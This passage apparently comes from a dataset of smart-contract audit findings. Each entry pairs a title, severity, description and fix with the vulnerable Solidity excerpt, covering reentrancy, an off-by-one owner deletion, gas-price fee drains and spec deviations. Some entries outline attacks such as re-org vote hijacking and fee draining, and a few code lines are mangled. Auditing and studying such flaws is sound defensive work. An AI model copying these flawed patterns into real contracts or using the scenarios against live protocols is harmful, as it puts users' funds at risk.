If the entire withdrawal cannot be satisfied, it can refund some tokens back to the user.чч```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), \"ERROR: Invalid token\");\\n require(_amountMLP != 0, \"ERROR: Invalid amount\");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), \"Withdraw amount > amount MLP\");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n -Removal of Multisig members will corrupt data structuresчmediumчThe Mozaic Multisig (the senate) can remove council members using the TYPE_DEL_OWNER operation:\\n```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, \"Invalid owner address\");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n\\nThe code finds the owner's index in the councilMembers array, copies all subsequent members downwards, and deletes the last element. Finally, it deletes the isCouncil[_owner] entry. 
The issue is actually in the contains() function.\\n```\\n function contains(address _owner) public view returns (uint) {\\n for (uint i = 1; i <= councilMembers.length; i++) {\\n if (councilMembers[i - 1] == _owner) {\\n return i;\\n }\\n }\\n return 0;\\n }\\n```\\n\\nThe function returns the index following the owner's index. Therefore, the intended owner is not deleted from councilMembers, instead the one after it is. The `submitProposal()` and `confirmTransaction()` privileged functions will not be affected by the bug, as they filter by isCouncil. However, the corruption of councilMembers will make deleting the member following the currently deleted owner fail, as deletion relies on finding the member in councilMembers.чFix the `contains()` function to return the correct index of _ownerчч```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, \"Invalid owner address\");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n -Attacker could abuse victim's vote to pass their own proposalчmediumчProposals are created using submitProposal():\\n```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n\\nAfter submission, council members approve them by calling confirmTransaction():\\n```\\n function confirmTransaction(uint256 _proposalId) public onlyCouncil \\n notConfirmed(_proposalId) {\\n confirmations[_proposalId][msg.sender] = true;\\n proposals[_proposalId].confirmation += 1;\\n emit 
Confirmation(_proposalId, msg.sender);\\n }\\n```\\n\\nNotably, the _proposalId passed to `confirmTransaction()` is simply the proposalCount at time of submission. This design allows the following scenario to occur:\\nUser A submits proposal P1\\nUser B is interested in the proposal and confirms it\\nAttacker submits proposal P2\\nA blockchain re-org occurs. Submission of P1 is dropped in place of P2.\\nUser B's confirmation is applied on top of the re-orged blockchain. Attacker gets their vote. We've seen very large re-orgs in top blockchains such as Polygon, so this threat remains a possibility to be aware of.чCalculate proposalId as a hash of the proposal properties. This way, votes cannot be misdirected.чч```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n -MozToken will have a much larger fixed supply than intended.чmediumчMozToken is planned to be deployed on all supported chains. Its total supply will be 1B. However, its constructor will mint 1B tokens on each deployment.\\n```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(\"Mozaic Token\", \"MOZ\", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\nчPass the minted supply as a parameter. 
Only on the main chain, mint 1B tokens.чч```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(\"Mozaic Token\", \"MOZ\", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n -Theoretical reentrancy attack when TYPE_MINT_BURN proposals are executedчlowчThe senate can pass a proposal to mint or burn tokens.\\n```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n\\nNote that the proposal is only marked as executed at the end of execution, but execution is checked at the start of the function.\\n```\\n function execute(uint256 _proposalId) public onlyCouncil {\\n require(proposals[_proposalId].executed == false, \"Error: \\n Proposal already executed.\");\\n require(proposals[_proposalId].confirmation >= threshold, \"Error: Not enough confirmations.\");\\n```\\n\\nInteraction with tokens should generally be assumed to grant arbitrary call execution to users. If the mint or `burn()` calls call `execute()` again, the proposal will be executed twice, resulting in double the amount minted or burned. 
Specifically for XMoz, it is not anticipated to yield execution to the to address, so the threat remains theoretical.чFollow the Check-Effects-Interactions design pattern, mark the function as executed at the start.чч```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n -XMozToken permits transfers from non-whitelisted addressesчlowчThe XMozToken is documented to forbid transfers except from whitelisted addresses or mints.\\n```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), \"transfer: not allowed\");\\n }\\n```\\n\\nHowever, as can be seen, non-whitelisted users can still transfer tokens, so long as it is to whitelisted destinations.чRemove the additional check in `_beforeTokenTransfer()`, or update the documentation accordingly.чч```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), \"transfer: not allowed\");\\n }\\n```\\n -XMozToken cannot be added to its own whitelistчlowчBy design, XMozToken should always be in the whitelist. 
However, `updateTransferWhitelist()` implementation forbids both removal and insertion of XMozToken to the whitelist.\\n```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), \"updateTransferWhitelist: \\n Cannot remove xMoz from whitelist\");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\nчMove the require statement into the else clause.чч```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), \"updateTransferWhitelist: \\n Cannot remove xMoz from whitelist\");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n -User fee token balance can be drained in a single operation by a malicious botчhighчIn `_buildFeeExecutable()`, BrahRouter calculates the total fee charged to the wallet. It uses tx. 
gas price to get the gas price specified by the bot.\\n```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\nчUse a gas oracle or a capped priority fee to ensure an inflated gas price down not harm the user.чч```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n -Users can drain Gelato deposit at little costчhighчIn Console automation, fees are collected via the `claimExecutionFees()` modifier:\\n```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 
initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\nчWhen calculating fees in buildFeeExecutable(), there are assumptions about the gas cost of an ERC20 transfer and a native transfer.\\n```\\n // Keeper network overhead -150k\\n uint256 internal constant GAS_OVERHEAD_NATIVE = 150_000 + 40_000;\\n uint256 internal constant GAS_OVERHEAD_ERC20 = 150_000 + 90_000;\\n```\\n\\nA good fix would be to check the actual gas usage and require it to be under the hard cap.Team responseAdded a gas check for this attack.Mitigation reviewApplied fix has been applied.чч```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n -Attackers can drain users over time by donating negligible ERC20 
amountчhighчIn the Console automation model, a strategy shall keep executing until its trigger check fails. For DCA strategies, the swapping trigger is defined as:\\n```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\nчDefine a DUST_AMOUNT, below that amount exit is allowed, while above that amount swap execution is allowed. User should only stand to gain from another party donating ERC20 tokens to their account.чч```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n -When FeePayer is subsidizing, users can steal gasчmediumч```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\nчThe root cause is that the gasUsed amount is subsidized as well as GAS_OVERHEAD_NATIVE, which is the gas reserved for the delivery from Gelato executors. 
By subsidizing only the Gelato gas portion, users will not gain from gas minting attacks, while the intention of improving user experience is maintained.чч```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n -Strategy actions could be executed out of order due to lack of reentrancy guardчmediumчThe Execute module performs automation of the fetched Executable array on wallet subaccounts.\\n```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\nчAdd a reentrancy guard for `executeAutomationViaBot()` and `executeTrustedAutomation()`.чч```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do 
{\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n -Anyone can make creating strategies extremely expensive for the userчmediumчIn Console architecture, users can deploy spare subaccounts (Gnosis Safes) so that when they will subscribe to a strategy most of the gas spending would have been spent at a low-gas phase.\\n```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n\\nImpact The issue is that anyone can call the deploy function and specify another user's wallet. While on the surface that sounds like donating gas costs, in practice this functionality can make operating with strategies prohibitively expensive. When users will subscribe to strategies, the StrategyRegistry will request a subaccount using this function:\\n```\\n function requestSubAccount(address _wallet) external returns (address) {\\n if (msg.sender != subscriptionRegistry) \\n revert OnlySubscriptionRegistryCallable();\\n // Try to find a subAccount which already exists\\n address[] memory subAccountList = walletToSubAccountMap[_wallet];\\n```\\n\\nAt this point, the entire subaccount array will be copied from storage to memory. 
Therefore, attackers can fill the array with hundreds of elements at a low-gas time and make creation of strategies very difficult.чLimit the number of spare subaccounts to something reasonable, like 10. Team Response: Removing the spare subaccount deployment. Mitigation review: Attack surface has been removed.чч```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n -DCA Strategies build orders that may not be executable, wasting feesчmediumчIn `_buildInitiateSwapExecutable()`, DCA strategies determine the swap parameters for the CoW Swap. The code has recently been refactored so that there may be more than one active order simultaneously. The issue is that the function assumes the user's entire ERC20 balance to be available for the order being built.\\n```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n\\nImpact This is a problem because if the previous order will be executed before the current order, there may not be enough funds to pull from the user to execute the swap. As a result, transaction execution fees are wasted.чEnsure only one swap can be in-flight at a time, or deduct the in-flight swap amounts from the current balance.чч```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? 
\\n inputTokenBalance : params.amountToSwap;\\n```\\n -User will lose all Console functionality when upgrading their wallet and an upgrade target has not been set upчmediumчConsole supports upgrading of the manager wallet using the `upgradeWalletType()` function.\\n```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n\\nNote that upgradablePaths are set by governance. There is a lack of check that the upgradable path is defined before performing the upgrade.\\n```\\n function _setWalletType(address _wallet, uint8 _walletType) private {\\n _walletDataMap[_wallet].walletType = _walletType;\\n }\\n```\\n\\nIf _upgradablePaths[fromWalletType] is zero (uninitialized), the user's wallet type shall become zero too. However, zero is an invalid value, as defined by the isWallet() view function:\\n```\\n function isWallet(address _wallet) public view returns (bool) \\n { WalletData memory walletData = _walletDataMap[_wallet];\\n if (walletData.walletType == 0 || walletData.feeToken == address(0)){\\n return false;\\n }\\n return true;\\n }\\n```\\n\\nImpact As a result, most of the functionality of Console is permanently broken when users upgrade their wallet when an upgrade path isn't set. 
They can salvage their funds if it is a Safe account, as they can still execute on it directly.чWhen settings a new wallet type, make sure the new type is not zero.чч```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n -Rounding error causes an additional iteration of DCA strategiesчlowчBoth CoW strategies receive an interval and total amountIn of tokens to swap. They calculate the amount per iteration as below:\\n```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\nчChange the amount requested from the management wallet to amountIn / iterations * iterations.чч```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n -Fee mismatch between contracts can make strategies unusableчlowчIn CoW Swap strategies, fee is set in the strategy contracts and then passed to `initiateSwap()`. 
It is built in _buildInitiateSwapExecutable():\\n```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n\\nThere is a mismatch between the constraints around fees between the strategy contracts and the `initiateSwap()` function:\\n```\\n function setSwapFee(uint256 _swapFee) external {\\n _onlyGov();\\n if (_swapFee > 10_000) { revert InvalidSlippage();\\n }\\n swapFee = _swapFee;\\n }\\n if (feeBps > 0) {\\n if (feeBps > 1_000) revert FeeTooHigh();\\n amountIn = amountToSwap * (MAX_BPS - feeBps) / MAX_BPS;\\n```\\nчEnforce the same constraints on the fee percentage in both contracts, or remove the check from one of them as part of a simplified security model.чч```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n -Reentrancy protection can likely be bypassedчhighчThe KeyManager offers reentrancy protection for interactions with the associated account. Through the LSP20 callbacks or through the `execute()` calls, it will call `_nonReentrantBefore()` before execution, and `_nonReentrantAfter()` post-execution. 
The latter will always reset the flag signaling entry.\\n```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n\\nAn attacker can abuse it to reenter provided that there exists some third-party contract with REENTRANCY_PERMISSION that performs some interaction with the contract. The attacker would trigger the third-party code path, which will clear the reentrancy status, and enable attacker to reenter. This could potentially be chained several times. Breaking the reentrancy assumption would make code that assumes such flows to be impossible to now be vulnerable.чIn `_nonReentrantAfter()`, the flag should be returned to the original value before reentry, rather than always setting it to false.чч```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n -LSP20 verification library deviates from spec and will accept fail valuesчmediumчThe functions `lsp20VerifyCall()` and `lsp20VerifyCallResult()` are called to validate the owner accepts some account interaction. The specification states they must return a specific 4 byte magic value. 
However, the implementation will accept any byte array that starts with the required magic value.\\n```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n\\nTherefore, implementations of the above functions which intend to signal failure status may be accepted by the verification wrapper above.чVerify that the return data length is 32 bytes (the 4 bytes are extended by the compiler), and that all other bytes are zero.чч```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? 
true : false;\\n }\\n```\\n -Deviation from spec will result in dislocation of receiver delegateчmediumчThe LSP0 `universalReceiver()` function looks up the receiver delegate by crafting a mapping key type.\\n```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n\\nMapping keys are constructed of a 10-byte prefix, 2 zero bytes and a 20-byte suffix. However, followers of the specification will use an incorrect suffix. The docs do not discuss the trimming of bytes32 into a bytes20 type. The mismatch may cause various harmful scenarios when interacting with the delegate not using the reference implementation.чDocument the trimming action in the LSP0 specification.чч```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n -KeyManager ERC165 does not support LSP20чmediumчLSP6KeyManager supports LSP20 call verification. However, in `supportInterface()` it does not return the LSP20 interfaceId.\\n```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n\\nAs a result, clients which correctly check for support of LSP20 methods will not operate with the KeyManager implementation.чInsert another supported interfaceId under `supportsInterface()`.чч```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n -LSP0 ownership functions deviate from specification and reject native tokensчlowчThe LSP specifications define the following functions for LSP0:\\n```\\n function transferOwnership(address newPendingOwner) external payable;\\n function 
renounceOwnership() external payable;\\n```\\n\\nHowever, their implementations are not payable.\\n```\\n function transferOwnership(address newOwner) public virtual\\n override(LSP14Ownable2Step, OwnableUnset)\\n {\\n```\\n\\n```\\n function renounceOwnership() public virtual override(LSP14Ownable2Step, OwnableUnset) {\\n address _owner = owner();\\n```\\n\\nThis may break interoperation between conforming and non-conforming contracts.чRemove the payable keyword in the specification for the above functions, or make the implementations payable.чч```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n -Transfers of vaults from an invalid source are not treated correctly by receiver delegateчlowчIn the universalReceiver() function, if the notifying contract does not support LSP9, yet the typeID corresponds to an LSP9 transfer, the function will return instead of reverting.\\n```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return \"LSP1: not an LSP9Vault ownership transfer\";\\n }\\n```\\nчRevert when dealing with transfers that cannot be valid.чч```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return \"LSP1: not an LSP9Vault ownership transfer\";\\n }\\n```\\n -Relayer can choose amount of gas for delivery of messageчlowчLSP6 supports relaying of calls using a supplied signature. The encoded message is defined as:\\n```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n\\nThe message doesn't include a gas parameter, which means the relayer can specify any gas amount. If the provided gas is insufficient, the entire transaction will revert. 
However, if the called contract exhibits different behavior depending on the supplied gas, a relayer (attacker) has control over that behavior.чSigned message should include the gas amount passed. Care should be taken to verify there is enough gas in the current state for the gas amount not to be truncated due to the 63/64 rule.чч```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n -_calculateClaim() does not distribute boost emissions correctlyчhighчThe function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. The idea is to distribute emissions only to veSatin tokens locked for more than minLockDurationForReward and only for the extra time the veSatin is locked for on top of minLockDurationForReward. As an example, if minLockDurationForReward is set to 6 months a veSatin locked for 7 months would receive emissions for 1 month and a veSatin locked for 5 months would receive no emissions at all. To do so the following code is executed in a loop, where every loop calculates the amount of emissions the veSatin accumulated during a specific week, in chronological order:\\n```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe code distributes the rewards if the elapsed time between lockEndTime (the locking end timestamp) and oldUserPoint.ts is bigger than minLockDurationForReward. However, oldUserPoint.ts is the timestamp of the last user action on a veSatin, for example depositing LP by calling `increaseAmount()`. As an example, a user that locks his veSatin and does nothing else will receive rewards for the whole locking duration. 
